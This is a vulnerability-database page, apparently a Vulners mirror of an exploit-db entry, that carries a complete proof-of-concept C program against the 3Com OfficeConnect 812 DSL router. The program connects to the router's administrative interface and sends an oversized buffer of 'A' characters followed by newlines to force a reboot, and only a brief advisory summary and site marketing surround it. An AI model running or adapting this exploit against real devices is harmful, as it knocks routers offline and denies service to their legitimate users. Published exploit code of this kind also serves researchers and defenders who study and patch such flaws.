Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service

🗓️ 21 Jul 2003 00:00:00Reported by David F.MadridType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 46 Views

3Com DSL Router vulnerability allows Denial of Service through long requests to admin interface.

Code
// source: https://www.securityfocus.com/bid/8248/info

A problem in the 3Com 812 OfficeConnect has been reported that may result in the router becoming unstable. Because of this, an attacker may be able to deny service to legitimate users of the vulnerable router by submitting an excessively long request.

/* 3com-DoS.c
 *
 * PoC DoS exploit for 3Com OfficeConnect DSL Routers.
 This PoC exploit the
 * vulnerability documented at:
<https://www.securityfocus.com/bid/8248>,
 * discovered by David F. Madrid.
 *
 * Successful exploitation of the vulnerability should
cause the router to
 * reboot.  It is not believed that arbitrary code
execution is possible -
 * check advisory for more information.
 *
 * -shaun2k2
 */


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("3Com OfficeConnect DSL Router DoS exploit by
shaun2k2 - <[email protected]>\n\n");
                printf("Usage: 3comDoS <3com_router> <port>\n");
                exit(-1);
        }

        int sock;
        char explbuf[521];
        struct sockaddr_in dest;
        struct hostent *he;

        if((he = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve %s!\n", argv[1]);
                exit(-1);
        }

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                perror("socket()");
                exit(-1);
        }

        printf("3Com OfficeConnect DSL Router DoS exploit by
shaun2k2 - <[email protected]>\n\n");

        dest.sin_addr = *((struct in_addr *)he->h_addr);
        dest.sin_port = htons(atoi(argv[2]));
        dest.sin_family = AF_INET;

        printf("[+] Crafting exploit buffer.\n");
        memset(explbuf, 'A', 512);
        memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);

        if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) == -1) {
                perror("connect()");
                exit(-1);
        }

        printf("[+] Connected...Sending exploit buffer!\n");
        send(sock, explbuf, strlen(explbuf), 0);
        sleep(2);
        close(sock);
        printf("\n[+] Exploit buffer sent!\n");
        return(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jul 2003 00:00Current
7.4High risk
Vulners AI Score7.4
3com dsl routerdenial of serviceadministrative interfacelong requestvulnerability exploit
46